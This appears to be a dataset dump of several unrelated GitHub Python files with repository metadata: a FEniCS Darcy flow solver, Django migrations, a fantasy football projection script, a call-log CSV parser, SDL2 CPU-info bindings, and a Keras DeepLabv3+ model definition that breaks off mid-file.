] | permissive | haf001/Master-Thesis | 33c1d5e2dbc0b4070fe849bf5321aca3b1afee55 | 67af51cf5e40135f1ce4f8d71218739188232eac | refs/heads/master | 2020-05-20T05:19:29.947677 | 2019-06-12T09:20:46 | 2019-06-12T09:20:46 | 185,402,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,273 | py | from fenics import *
import numpy as np
from ufl import nabla_div
import sympy as sym
import matplotlib.pyplot as plt
def solver(f, p_e, phi, K_val, mesh, degree):
"""
Solving the Darcy flow equation for a Unit Square Medium with Pressure Boundary Conditions.
"""
# Defining the function space
V = FunctionSpace(mesh, 'P', degree)
# Defining Dirichlet Boundary Conditions
p_L = Constant(1.0)
def boundary_L(x, on_boundary):
return on_boundary and near(x[0], 0)
bc_L = DirichletBC(V, p_L, boundary_L)
p_R = Constant(0.0)
def boundary_R(x, on_boundary):
return on_boundary and near(x[0], 1)
bc_R = DirichletBC(V, p_R, boundary_R)
bcs = [bc_L, bc_R]
# Defining the variational problem
p = TrialFunction(V)
v = TestFunction(V)
K = K_val
a = dot(K*grad(p), grad(v))*dx
L = inner(f, v)*dx
# Computing Numerical Pressure
p = Function(V)
solve(a == L, p, bcs)
return p
def run_solver():
"Run solver to compute and post-process solution"
mesh = UnitSquareMesh(50, 50)
# Setting up problem specific parameters where p_e = 1 - x^2 and calling solver
p_e = Expression('1 - x[0]*x[0]', degree=2)
phi = Constant(0.3)
d = 2
I = Identity(d)
M = Expression('fmax(0.10, exp(-pow(10.0*x[1]-1.0*sin(10.0*x[0])-5.0, 2)))', degree=2, domain=mesh)
K_val = M*I
K = K_val
# The components for term grad_p_e below is made up of the differentials of p_e with respect to x and y respectively
grad_p_e = Expression(('-2*x[0]', '0.0'), degree=1, domain=mesh)
# Defining the source term
f = nabla_div(dot(-K, grad_p_e))
# Calling Solver
p = solver(f, p_e, phi, K, mesh, 1)
# Evaluating and projecting the Darcy velocity profile, w
w_1 = -K*grad(p)
w = project(w_1, VectorFunctionSpace(mesh, 'P', degree=1))
# Evaluating and projecting the Fluid velocity profile, uf
uf_1 = w_1/phi
uf = project(uf_1, VectorFunctionSpace(mesh, 'P', degree=1))
# Saving numerical solutions for visualization
xdmf = XDMFFile('Numerical_Pressure_Gradient.xdmf')
p.rename('Pressure', '')
xdmf.write(p)
xdmf.close()
xdmf = XDMFFile('Darcy_Velocity_Profile.xdmf')
w.rename('Darcy_velocity', '')
xdmf.write(w)
xdmf.close()
xdmf = XDMFFile('Fluid_Velocity_Profile.xdmf')
uf.rename('Fluid_velocity', '')
xdmf.write(uf)
xdmf.close()
def iterate_solver():
"Iterating solver to produce pressure p = 1 - x^2 over different mesh sizes and generating plots"
# Setting up parameters for iteration
p_e = Expression('1 - x[0]*x[0]', degree=2)
# Iterating over mesh number m, and appending the respective Cell Sizes h, resulting L2 Error E, Degree of freedom DOF and integral of grad(p)*grad(p) over domain GPS
E = []
h = []
DOF = []
GPS = []
GPES = []
for m in range (4, 380, 4):
mesh = UnitSquareMesh(m, m)
V = FunctionSpace(mesh, 'P', 1)
p_e_f = interpolate(p_e, FunctionSpace(mesh, 'P', 2))
phi = Constant(0.3)
d = 2
I = Identity(d)
M = Expression('fmax(0.10, exp(-pow(10.0*x[1]-1.0*sin(10.0*x[0])-5.0, 2)))', degree=2, domain=mesh)
K = M*I
grad_p_e = Expression(('-2*x[0]', '0.0'), degree=1, domain=mesh)
f = nabla_div(dot(-K, grad_p_e))
# Calling solver
p = solver(f, p_e, phi, K, mesh, degree=1)
# Computing for L2 Error Norm and Cell Sizes h
E1 = errornorm(p_e_f, p, 'L2')
print('E1=', E1)
E.append(E1)
h.append(mesh.hmin())
DOF.append(len(V.dofmap().dofs()))
IGPS = assemble(inner(grad(p), grad(p))*dx)
GPS.append(IGPS)
IGPES = assemble(inner(grad(p_e_f), grad(p_e_f))*dx)
GPES.append(IGPES)
Ea = np.array(E)
ha = np.array(h)
DOFa = np.array(DOF)
GPSa = np.array(GPS)
GPESa = np.array(GPES)
# Computing the Logs of L2 Error and Cell Sizes h with print of the Convergence Rate
LogEa = np.log(Ea)
Logha = np.log(ha)
LogDOFa = np.log(DOFa)
LogGPSa = np.log(GPSa)
# the first number printed in the script below is the gradient of the Log plot of L2 Error against cell size, h. This is the error convergence rate.
print(np.polyfit(Logha, LogEa, deg=1))
return (E, h, DOF, GPS, GPES)
if __name__ == '__main__':
run_solver()
E, h, DOF, GPS, GPES = iterate_solver()
# Log plot of L2 Error E against Cell Sizes h, the gradient of the line gives the convergence rate as well
x = np.log(h)
y = np.log(E)
plt.plot(x,y)
plt.title('Log of L2 Error vs. Log of Cell Sizes h')
plt.xlabel('Log Cell Size, h')
plt.ylabel('Log L2 Error')
plt.savefig('Log_L2_Error_vs_Log_Cell_Sizes_h.png')
# Semilog plot of L2 Error against DOF
plt.figure()
plt.semilogy(DOF, E)
plt.title('Semilog L2 Error vs DOF')
plt.xlabel('DOF')
plt.ylabel('L2 Error')
plt.savefig('Semilog_L2_Error_vs_DOF.png')
# Log plot of L2 Error against DOF
plt.figure()
x = np.log(DOF)
y = np.log(E)
plt.plot(x,y)
plt.title('Log L2 Error vs. Log DOF')
plt.xlabel('Log DOF')
plt.ylabel('Log L2 Error')
plt.savefig('Log_L2_Error_vs_Log_DOF.png')
# Log plot of Integral of grad(p) squared over Omega (GPS) against Cell Sizes h for Mesh Independence
plt.figure()
x = np.log(h)
y = np.log(GPS)
plt.plot(-x,y)
plt.axvline(x=4.0, color='r', linestyle='dotted')
plt.axhline(y=0.28768, color='r', linestyle='dotted')
plt.title('Log Integral of grad(p)*grad(p) over omega vs. -Log Cell Size, h')
plt.xlabel('-Log Cell Size, h')
plt.ylabel('Log of Integral of grad(p) squared over omega')
plt.savefig('Log_integral_of_grad_p_square_vs_-Log_Cell_Size_h.png')
# Plot of (GPES-GPS) against Cell Size, h
plt.figure()
x = h
y = np.log(GPES)-np.log(GPS)
plt.plot(-np.log(x), y)
plt.axvline(x=4.0, color='r', linestyle='dotted')
plt.axhline(y=0.00001, color='r', linestyle='dotted')
plt.title('Log GPES - Log GPS vs. -Log Cell Size, h')
plt.xlabel('-Log Cell Size, h')
plt.ylabel('Log GPES - Log GPS')
plt.savefig('Log_GPES-Log_GPS_vs_-Log_Cell_Size_h.png')
| [
"noreply@github.com"
] | noreply@github.com |
ace559b46e79210154608496701d451bae6e9f1d | df21c2c16ecfb4a46b1d88b0474291ac67c8a05a | /app/migrations/0003_auto_20180708_1239.py | 5d2a0d3ed37768c660d5b76e1dec863b6836cb8e | [] | no_license | aditya2222/CatchUp | 245dc4d122be7d596f8928d32a33acbbd754a4f3 | 915363faf7b59c81da070a70f9587f177a20d695 | refs/heads/master | 2020-03-22T14:21:17.689064 | 2018-07-08T14:08:24 | 2018-07-08T14:08:24 | 140,172,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | # Generated by Django 2.0.7 on 2018-07-08 12:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app', '0002_auto_20180708_1219'),
]
operations = [
migrations.AddField(
model_name='post',
name='CurrentUser',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='post',
name='UserName',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"adityasingh222247@gmail.com"
] | adityasingh222247@gmail.com |
d57ea15208418d0ea15cbe608a80dddf6e7f5ef2 | 94531cbb9cba199f10e603d385f7480b77a18f2b | /myBlog/migrations/0001_initial.py | dc241084329a4b8f5747d6937e1b3bc9b6a7eec3 | [] | no_license | toufiqur-rahman/django_blog | 6419892c64a4bd4130351082b4fd44451816c265 | 1b0f1189d8d60b85cc35e1b8faaeae64b94f81a7 | refs/heads/master | 2020-03-28T09:45:48.000434 | 2018-09-10T18:55:43 | 2018-09-10T18:55:43 | 148,057,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | # Generated by Django 2.1.1 on 2018-09-05 17:45
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"toufique.jami@gmail.com"
] | toufique.jami@gmail.com |
3c21a9fe28c43de3e10ee1d30def42d702d74bff | 14c4a16e75b348be31a224818c8f8db62746345a | /run_projections.py | c085dbbba2a2024156eb579c1ef871f9804ff07d | [] | no_license | BenikaH/nflstats | c43bbfd3806343b5f1a4a5e55f3ee7b1c6285dd9 | 269ee69facd280b3bd1e4f6724c7f7dfafd16396 | refs/heads/master | 2020-03-27T12:06:26.035175 | 2018-08-25T18:42:07 | 2018-08-25T18:42:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,876 | py | #!/usr/bin/env python3
from get_player_stats import *
from playermodels.positions import *
from ruleset import *
from get_fantasy_points import get_points
import os.path
import argparse
import numpy as np
import numpy.random as rand
# return a player from a dataframe if a unique one exists, else return None
# we could make this a bit more robust and flexible and move it to tools.py
# (e.g. option to select by team)
def get_player_from_df(df, pname, pos=None, team=None):
pix = (df.player == pname)
if pos is not None: pix &= (df.pos == pos)
if team is not None: pix &= (df.team == team)
if pix.any():
# pl = df.iloc[df.index[pix]]
pl = df[pix]
assert(len(pl) == 1)
return pl.iloc[0]
# try removing jr. / sr.
if pname[-3:].lower() in ['jr.', 'sr.']:
return get_player_from_df(df, pname[:-3].strip(), pos=pos, team=team)
return None
def main():
logging.getLogger().setLevel(logging.DEBUG)
np.set_printoptions(precision=4)
pd.options.display.precision = 2 # default is 6
parser = argparse.ArgumentParser(description='generate projections')
parser.add_argument('position', type=str, choices=['QB', 'RB', 'WR', 'TE'], help='which position to simulate')
parser.add_argument('--ruleset', type=str, choices=['phys', 'dude', 'bro', 'nycfc'],
default='phys', help='which ruleset to use')
parser.add_argument('--year',nargs='?', type=int, default=2018, help='what is the current year')
parser.add_argument('--expert-touch', nargs='?', type=bool, default=True, help='scale models to meet expert consensus for rush attempts and targets')
parser.add_argument('--n-seasons',nargs='?', type=int, default=128, help='number of seasons to simulate')
args = parser.parse_args()
pos = args.position
current_year = args.year
if args.ruleset == 'phys':
rules = phys_league
if args.ruleset == 'dude':
rules = dude_league
if args.ruleset == 'bro':
rules = bro_league
if args.ruleset == 'nycfc':
rules = nycfc_league
scale_touch = args.expert_touch
# get player index
pidx = get_pos_players(pos)
# players like Luck who didn't play last year will be ruled out here.
# we have the expert list to compare to so we can allow another year back.
pidx = pidx[(pidx['pos'] == pos) & (pidx['year_max'] >= current_year-2)]
ngames = 16
nseasons = args.n_seasons
# get expert projections so we can adjust to touches
expertdf = pd.read_csv('preseason_rankings/project_fp_{}_pre{}.csv'.format(pos.lower(), current_year))
# any known suspension data
sussdf = pd.read_csv('data/suspensions.csv')
# data of expectation values to print out at the end (and possibly save)
evdf = pd.DataFrame(columns=['player', 'pos'], dtype=int)
np.random.seed(3490) # pick a constant seed so we can debug weird outcomes
# for _,prow in pidx.iterrows():
for _,exproj in expertdf.iterrows():
pname = exproj['player']
if exproj['fp_projection'] < 32:
logging.debug('skipping {} as irrelevant'.format(pname))
continue
# pname,pid = prow[['player', 'pfr_id']]
logging.info('training model for {}'.format(pname))
prow = get_player_from_df(pidx, pname)
# exproj = get_player_from_df(expertdf, pname)
# if exproj is None:
# # they are probably retired; let's not waste time simulating them
# logging.warning('no expert projection for {}. skipping.'.format(pname))
# continue
pmod = gen_player_model(pos)
pdf = get_player_stats(prow['pfr_id']).fillna(0) if prow is not None else pd.DataFrame(columns=['player', 'pos', 'team', 'year'])
stat_vars = [model.pred_var for model in pmod.models]
for st in stat_vars:
if st not in pdf:
pdf[st] = 0 # set non-existent values to zero
years = pdf['year'].unique()
# if len(years) == 0:
# then we need to debug why this player isn't being read, tho this should be fine for rookies
# logging.error(' no player data for {}!'.format(pname))
assert((np.diff(years) > 0).all())
pcterrs = []
for year in years:
ydf = pdf[pdf['year'] == year]
games = ydf['game_num']
assert((np.diff(games) > 0).all()) # this sometimes fails when players are traded mid-week. we could just pick the one with the most points (so far just manually deleting)
meanpts = get_points(rules, ydf).mean()
for _,game in ydf.iterrows():
# evs = pmod.evs() # expected outcome
# expt = get_points(rules, evs) # works from dict too?
if meanpts != 0:
actpt = get_points(rules, game)
pcterrs.append((actpt-meanpts)/meanpts)
pmod.update_game(game)
pmod.new_season()
pcterrs = np.array(pcterrs)
if np.isnan(pcterrs).any():
print(pcterrs)
exit(1)
# now we're done training; do simulations next
# get the number of games a player is expected to play
pgames = ngames # number of games this player expects to play. we'll check suspensions:
psus = get_player_from_df(sussdf, pname, pos)
if psus is not None:
gsus = psus.games_suspended
logging.info(psus.details)
if not np.isnan(gsus):
pgames -= int(gsus)
logging.info(' -- {} game suspension'.format(gsus))
else:
logging.info('suspension time unknown.')
if scale_touch:
re_ev_dict = {}
for touchvar in set(stat_vars) & set(['pass_att', 'rush_att']):
re_ev_dict[touchvar] = exproj[touchvar]/pgames
if 'targets' in stat_vars:
# expert projections from this source don't have targets, just receptions
modevs = pmod.evs()
re_ev_dict['targets'] = modevs['targets'] * exproj['rec'] / modevs['rec'] / pgames
pmod.revert_evs(re_ev_dict)
# if pname in ['Todd Gurley', 'Ezekiel Elliott', 'Le\'Veon Bell', 'Saquon Barkley', 'Royce Freeman']:
# if pname in ['dDeAndre Hopkins', 'Odell Beckham Jr.']:
# print(pmod)
fpdf = pd.concat([pd.DataFrame((pmod.gen_game() for _ in range(pgames))) for _ in range(nseasons)], ignore_index=True)
# fps = pd.concat((get_points( rules, fpdf )), ignore_index=True)
fps = get_points( rules, fpdf )
largegames = fps > 50
if largegames.any():
print(pname)
print(fpdf[largegames])
fp_2d,fp_1d,fp_med,fp_1u,fp_2u = fps.quantile((0.02275, 0.15865, 0.5, 0.84135, 0.97725))
evdat = {key:(pgames*val) for key,val in pmod.evs().items()}
evdat['player'] = pname
evdat['pos'] = pos
evdat['g'] = pgames
evdat['ex_pred'] = exproj['fp_projection']
evdat['fpts_ev'] = get_points( rules, evdat )
evdat['fpts_sim'] = fps.mean()*pgames
evdat['fpts_med'] = fp_med
evdat['fpts_simstd'] = fps.std()*np.sqrt(pgames)
evdat['volatility'] = np.sqrt(np.mean(pcterrs**2))
if fp_med > 0:
evdat['vol1'] = 0.5*(fp_1u - fp_1d)/fp_med
evdat['vol2'] = 0.5*(fp_2u - fp_2d)/fp_med
evdat['fpts_u1'] = fp_1u
evdat['fpts_d1'] = fp_1d
evdf = evdf.append(evdat, ignore_index=True)
print(evdf.sort_values('fpts_ev', ascending=False))
evdf.to_csv('data/{}_simulations_{}.csv'.format(pos.lower(), current_year), index=False)
return
if __name__ == '__main__':
main()
| [
"mfclark3690@gmail.com"
] | mfclark3690@gmail.com |
a5cd4ba759fc6e7df503e00af2402bb95ae28a44 | e7fa451c8fba591c0e0c25716d7fe72c8582345e | /Joystick ID Fixer/sdl2/cpuinfo.py | 4b6ed554ad6f0e3a917fee732251c22b77855ad5 | [
"MIT"
] | permissive | danricho/SC-Joystick-Configuration | 81d51eb3b94e70cc2b886ff92d0fa9cb7d30d764 | 7a0b463b348f7de0abad39702dae0100f9f935f0 | refs/heads/master | 2021-01-17T17:08:47.320006 | 2020-07-02T06:59:08 | 2020-07-02T06:59:08 | 62,977,107 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,137 | py | from ctypes import c_int
from .dll import _bind, nullfunc
from .stdinc import SDL_bool
__all__ = ["SDL_CACHELINE_SIZE", "SDL_GetCPUCount", "SDL_GetCPUCacheLineSize",
"SDL_HasRDTSC", "SDL_HasAltiVec", "SDL_HasMMX", "SDL_Has3DNow",
"SDL_HasSSE", "SDL_HasSSE2", "SDL_HasSSE3", "SDL_HasSSE41",
"SDL_HasSSE42", "SDL_GetSystemRAM", "SDL_HasAVX"
]
SDL_CACHELINE_SIZE = 128
SDL_GetCPUCount = _bind("SDL_GetCPUCount", None, c_int)
SDL_GetCPUCacheLineSize = _bind("SDL_GetCPUCacheLineSize", None, c_int)
SDL_HasRDTSC = _bind("SDL_HasRDTSC", None, SDL_bool)
SDL_HasAltiVec = _bind("SDL_HasAltiVec", None, SDL_bool)
SDL_HasMMX = _bind("SDL_HasMMX", None, SDL_bool)
SDL_Has3DNow = _bind("SDL_Has3DNow", None, SDL_bool)
SDL_HasSSE = _bind("SDL_HasSSE", None, SDL_bool)
SDL_HasSSE2 = _bind("SDL_HasSSE2", None, SDL_bool)
SDL_HasSSE3 = _bind("SDL_HasSSE3", None, SDL_bool)
SDL_HasSSE41 = _bind("SDL_HasSSE41", None, SDL_bool)
SDL_HasSSE42 = _bind("SDL_HasSSE42", None, SDL_bool)
SDL_GetSystemRAM = _bind("SDL_GetSystemRAM", None, c_int, nullfunc)
SDL_HasAVX = _bind("SDL_HasAVX", None, SDL_bool, nullfunc)
| [
"noreply@github.com"
] | noreply@github.com |
22e2e2406a80d650dca9e60eae4d61b3a850429a | a3d40bd366ea747c76bd8bd40d3a3bdfe617088c | /code for call records.py | d6a1b4c773fc0dde664948c096ff5f65bca49bde | [] | no_license | sshchan/gshdata | 258033f77b946f10a5c2c865f25317592d1934eb | c217249d432936b7b3ad92b4600db242f3e9bf64 | refs/heads/master | 2020-05-05T04:56:52.367318 | 2019-04-05T18:16:03 | 2019-04-05T18:16:03 | 179,731,557 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,859 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 4 14:31:43 2019
@author: user
"""
#
#import xlrd
#
#d = {}
#callLogsRec = xlrd.open_workbook('/C:/Users/user/AppData/Local/Temp/Temp1_GSH_19MAR2019.zip/FOR_UNCLASS/Phones (PARSED)/GSH_CallLogs.csv')
#callLogsexcel = callLogsRec.sheet_by_index(2)
#for i in range(16347):
# cell_value_number = callLogsexcel.cell(i,0).value
# cell_value_name = callLogsexcel.cell(i,1).value
# d[cell_value_number] = cell_value_name
#import csv
#
#with open('GSH_CallLogs.csv') as csvfile:
# reader = csv.reader(csvfile)
#
# mydict = {rows[0]:rows[1] for rows in reader}
import csv
with open('GSH_CallLogs.csv', newline = '', encoding = 'utf8') as csvfile:
reader = csv.reader(csvfile, delimiter=' ', quotechar='|')
data = [row for row in csv.reader(csvfile)]
numbers = []
for i in range(1,len(data)):
numbers.append(data[i][0])
print(numbers)
names = []
for i in range(1, len(data)):
names.append(data[i][1])
print(names)
call_num = []
for i in range(1, len(data)):
call_num.append(data[i][5])
print(call_num)
num_and_names = []
for digit, alias in zip(numbers, names):
num_and_names.append([digit, alias])
print(num_and_names)
mappedDictionary = dict(zip(call_num, num_and_names))
print(mappedDictionary)
# num_and_names.append([digit, alias])
# print(num_and_names)
# num_and_names = [digit, alias]
# print(num_and_names)
# result = {}
# for row in reader:
# key = row[5]
# if key in result:
# # implement your duplicate row handling here
# pass
# result[key] = row[1:]
# print(result)
#
| [
"noreply@github.com"
] | noreply@github.com |
aba137d2ba8d09a62e8c31bd44e5e317756309e1 | 639493af246a2d00fc1ef8f17c4e666d11537677 | /Models/Deeplabv3.py | 405c8a07245f51e20436cc4f6aef3728eee90483 | [] | no_license | brillianti/Deeplabv3 | ab68ed7b5a29ccbbf8f27fec441c83f5186ba622 | f4aad6b112c2c629766ba54434ead4eb617ba0b8 | refs/heads/master | 2022-04-22T21:34:29.790094 | 2020-04-25T15:19:32 | 2020-04-25T15:19:32 | 258,806,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,086 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from keras.models import Model
from keras.activations import relu
from keras.layers import Conv2D, DepthwiseConv2D, UpSampling2D, ZeroPadding2D, Lambda, AveragePooling2D, Input, \
Activation, Concatenate, Add, Reshape, BatchNormalization, Dropout
from keras.engine import Layer, InputSpec
from keras.engine.topology import get_source_inputs
from keras import backend as K, layers
def SepConv_BN(x, filters, prefix, stride=1, kernel_size=3, rate=1, depth_activation=False, epsilon=1e-3):
""" SepConv with BN between depthwise & pointwise. Optionally add activation after BN
Implements right "same" padding for even kernel sizes
Args:
x: input tensor
filters: num of filters in pointwise convolution
prefix: prefix before name
stride: stride at depthwise conv
kernel_size: kernel size for depthwise convolution
rate: atrous rate for depthwise convolution
depth_activation: flag to use activation between depthwise & pointwise convs
epsilon: epsilon to use in BN layer
"""
if stride == 1:
depth_padding = 'same'
else:
kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)
pad_total = kernel_size_effective - 1
pad_beg = pad_total // 2
pad_end = pad_total - pad_beg
x = ZeroPadding2D((pad_beg, pad_end))(x)
depth_padding = 'valid'
if not depth_activation:
x = Activation('relu')(x)
x = DepthwiseConv2D((kernel_size, kernel_size), strides=(stride, stride), dilation_rate=(rate, rate),
padding=depth_padding, use_bias=False, name=prefix + '_depthwise')(x)
x = BatchNormalization(name=prefix + '_depthwise_BN', epsilon=epsilon)(x)
if depth_activation:
x = Activation('relu')(x)
x = Conv2D(filters, (1, 1), padding='same',
use_bias=False, name=prefix + '_pointwise')(x)
x = BatchNormalization(name=prefix + '_pointwise_BN', epsilon=epsilon)(x)
if depth_activation:
x = Activation('relu')(x)
return x
def _conv2d_same(x, filters, prefix, stride=1, kernel_size=3, rate=1):
"""Implements right 'same' padding for even kernel sizes
Without this there is a 1 pixel drift when stride = 2
Args:
x: input tensor
filters: num of filters in pointwise convolution
prefix: prefix before name
stride: stride at depthwise conv
kernel_size: kernel size for depthwise convolution
rate: atrous rate for depthwise convolution
"""
if stride == 1:
return Conv2D(filters,
(kernel_size, kernel_size),
strides=(stride, stride),
padding='same', use_bias=False,
dilation_rate=(rate, rate),
name=prefix)(x)
else:
kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)
pad_total = kernel_size_effective - 1
pad_beg = pad_total // 2
pad_end = pad_total - pad_beg
x = ZeroPadding2D((pad_beg, pad_end))(x)
return Conv2D(filters,
(kernel_size, kernel_size),
strides=(stride, stride),
padding='valid', use_bias=False,
dilation_rate=(rate, rate),
name=prefix)(x)
def _xception_block(inputs, depth_list, prefix, skip_connection_type, stride,
rate=1, depth_activation=False, return_skip=False):
""" Basic building block of modified Xception network
Args:
inputs: input tensor
depth_list: number of filters in each SepConv layer. len(depth_list) == 3
prefix: prefix before name
skip_connection_type: one of {'conv','sum','none'}
stride: stride at last depthwise conv
rate: atrous rate for depthwise convolution
depth_activation: flag to use activation between depthwise & pointwise convs
return_skip: flag to return additional tensor after 2 SepConvs for decoder
"""
global outputs, skip
residual = inputs
for i in range(3):
residual = SepConv_BN(residual,
depth_list[i],
prefix + '_separable_conv{}'.format(i + 1),
stride=stride if i == 2 else 1,
rate=rate,
depth_activation=depth_activation)
if i == 1:
skip = residual
if skip_connection_type == 'conv':
shortcut = _conv2d_same(inputs, depth_list[-1], prefix + '_shortcut',
kernel_size=1,
stride=stride)
shortcut = BatchNormalization(name=prefix + '_shortcut_BN')(shortcut)
outputs = layers.add([residual, shortcut])
elif skip_connection_type == 'sum':
outputs = layers.add([residual, inputs])
elif skip_connection_type == 'none':
outputs = residual
if return_skip:
return outputs, skip
else:
return outputs
def _make_divisible(v, divisor, min_value=None):
if min_value is None:
min_value = divisor
new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)
# Make sure that round down does not go down by more than 10%.
if new_v < 0.9 * v:
new_v += divisor
return new_v
def _inverted_res_block(inputs, expansion, stride, alpha, filters, block_id, skip_connection, rate=1):
in_channels = inputs._keras_shape[-1]
pointwise_conv_filters = int(filters * alpha)
pointwise_filters = _make_divisible(pointwise_conv_filters, 8)
x = inputs
prefix = 'expanded_conv_{}_'.format(block_id)
if block_id:
# Expand
x = Conv2D(expansion * in_channels, kernel_size=1, padding='same',
use_bias=False, activation=None,
name=prefix + 'expand')(x)
x = BatchNormalization(epsilon=1e-3, momentum=0.999,
name=prefix + 'expand_BN')(x)
# x = Lambda(lambda x: relu(x, max_value=6.))(x)
x = Lambda(lambda x: relu(x, max_value=6.), name=prefix + 'expand_relu')(x)
# x = Activation(relu(x, max_value=6.), name=prefix + 'expand_relu')(x)
else:
prefix = 'expanded_conv_'
# Depthwise
x = DepthwiseConv2D(kernel_size=3, strides=stride, activation=None,
use_bias=False, padding='same', dilation_rate=(rate, rate),
name=prefix + 'depthwise')(x)
x = BatchNormalization(epsilon=1e-3, momentum=0.999,
name=prefix + 'depthwise_BN')(x)
# x = Activation(relu(x, max_value=6.), name=prefix + 'depthwise_relu')(x)
x = Lambda(lambda x: relu(x, max_value=6.), name=prefix + 'depthwise_relu')(x)
x = Conv2D(pointwise_filters,
kernel_size=1, padding='same', use_bias=False, activation=None,
name=prefix + 'project')(x)
x = BatchNormalization(epsilon=1e-3, momentum=0.999,
name=prefix + 'project_BN')(x)
if skip_connection:
return Add(name=prefix + 'add')([inputs, x])
# if in_channels == pointwise_filters and stride == 1:
# return Add(name='res_connect_' + str(block_id))([inputs, x])
return x
def Deeplabv3(nClasses=2,input_height=224, input_width=224):
""" Instantiates the Deeplabv3+ architecture
Optionally loads weights pre-trained
on PASCAL VOC. This model is available for TensorFlow only,
and can only be used with inputs following the TensorFlow
data format `(width, height, channels)`.
# Arguments
weights: one of 'pascal_voc' (pre-trained on pascal voc)
or None (random initialization)
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: shape of input image. format HxWxC
PASCAL VOC model was trained on (512,512,3) images
classes: number of desired classes. If classes != 21,
last layer is initialized randomly
backbone: backbone to use. one of {'xception','mobilenetv2'}
OS: determines input_shape/feature_extractor_output ratio. One of {8,16}.
Used only for xception backbone.
alpha: controls the width of the MobileNetV2 network. This is known as the
width multiplier in the MobileNetV2 paper.
- If `alpha` < 1.0, proportionally decreases the number
of filters in each layer.
- If `alpha` > 1.0, proportionally increases the number
of filters in each layer.
- If `alpha` = 1, default number of filters from the paper
are used at each layer.
Used only for mobilenetv2 backbone
# Returns
A Keras model instance.
# Raises
RuntimeError: If attempting to run this model with a
backend that does not support separable convolutions.
ValueError: in case of invalid argument for `weights` or `backbone`
"""
input_tensor = None
backbone = 'xception'
OS = 16
alpha = 1.
input_shape = (input_height, input_width, 3) #input_shape=(224,224,3)
global atrous_rates, skip1
if K.backend() != 'tensorflow':
raise RuntimeError('The Deeplabv3+ model is only available with '
'the TensorFlow backend.')
if not (backbone in {'xception', 'mobilenetv2'}):
raise ValueError('The `backbone` argument should be either '
'`xception` or `mobilenetv2` ')
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
batches_input = Lambda(lambda x: x / 127.5 - 1)(img_input)
if backbone == 'xception':
if OS == 8:
entry_block3_stride = 1
middle_block_rate = 2 # ! Not mentioned in paper, but required
exit_block_rates = (2, 4)
atrous_rates = (12, 24, 36)
else:
entry_block3_stride = 2
middle_block_rate = 1
exit_block_rates = (1, 2)
atrous_rates = (6, 12, 18)
x = Conv2D(32, (3, 3), strides=(2, 2),
name='entry_flow_conv1_1', use_bias=False, padding='same')(batches_input)
x = BatchNormalization(name='entry_flow_conv1_1_BN')(x)
x = Activation('relu')(x)
x = _conv2d_same(x, 64, 'entry_flow_conv1_2', kernel_size=3, stride=1)
x = BatchNormalization(name='entry_flow_conv1_2_BN')(x)
x = Activation('relu')(x)
x = _xception_block(x, [128, 128, 128], 'entry_flow_block1',
skip_connection_type='conv', stride=2,
depth_activation=False)
x, skip1 = _xception_block(x, [256, 256, 256], 'entry_flow_block2',
skip_connection_type='conv', stride=2,
depth_activation=False, return_skip=True)
x = _xception_block(x, [728, 728, 728], 'entry_flow_block3',
skip_connection_type='conv', stride=entry_block3_stride,
depth_activation=False)
for i in range(16):
x = _xception_block(x, [728, 728, 728], 'middle_flow_unit_{}'.format(i + 1),
skip_connection_type='sum', stride=1, rate=middle_block_rate,
depth_activation=False)
x = _xception_block(x, [728, 1024, 1024], 'exit_flow_block1',
skip_connection_type='conv', stride=1, rate=exit_block_rates[0],
depth_activation=False)
x = _xception_block(x, [1536, 1536, 2048], 'exit_flow_block2',
skip_connection_type='none', stride=1, rate=exit_block_rates[1],
depth_activation=True)
else:
OS = 8
first_block_filters = _make_divisible(32 * alpha, 8)
x = Conv2D(first_block_filters,
kernel_size=3,
strides=(2, 2), padding='same',
use_bias=False, name='Conv')(batches_input)
x = BatchNormalization(
epsilon=1e-3, momentum=0.999, name='Conv_BN')(x)
x = Lambda(lambda x: relu(x, max_value=6.))(x)
x = _inverted_res_block(x, filters=16, alpha=alpha, stride=1,
expansion=1, block_id=0, skip_connection=False)
x = _inverted_res_block(x, filters=24, alpha=alpha, stride=2,
expansion=6, block_id=1, skip_connection=False)
x = _inverted_res_block(x, filters=24, alpha=alpha, stride=1,
expansion=6, block_id=2, skip_connection=True)
x = _inverted_res_block(x, filters=32, alpha=alpha, stride=2,
expansion=6, block_id=3, skip_connection=False)
x = _inverted_res_block(x, filters=32, alpha=alpha, stride=1,
expansion=6, block_id=4, skip_connection=True)
x = _inverted_res_block(x, filters=32, alpha=alpha, stride=1,
expansion=6, block_id=5, skip_connection=True)
# stride in block 6 changed from 2 -> 1, so we need to use rate = 2
